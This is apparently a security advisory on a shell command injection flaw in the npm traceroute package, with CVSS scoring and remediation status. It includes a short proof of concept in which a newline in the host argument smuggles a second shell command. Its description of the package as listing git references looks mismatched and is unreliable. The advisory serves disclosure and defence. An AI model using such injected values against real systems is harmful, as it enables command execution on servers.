Shell Command Injection

Affecting traceroute package, versions <=1.0.0

Do your applications use this vulnerable package? Test your applications

Overview

traceroute is an npm package used for listing references in a remote git repository.

Affected versions of this package are vulnerable to Arbitrary Command Injection due to the insecure use of exec. An attacker can add a newline %0a after the host addr, and inject malicious shell commands to disrupt server operation or obtain sensitive information.

PoC by Dor Dali

traceroute = require('traceroute');

host = '127.0.0.1\ntouch /tmp/malicious';

traceroute.trace(host, function (err,hops) {
    // the file /tmp/malicious was created
    console.log(hops);
});

Remediation

There currently is no fixed version for traceroute. A fix is on the master branch but was not published to npm.

References

CVSS Score

10.0
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    Low
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L/E:F/RL:O/RC:C
Credit
Dor Dali
CWE
CWE-78
Snyk ID
npm:traceroute:20160311
Disclosed
09 Nov, 2017
Published
23 Jan, 2018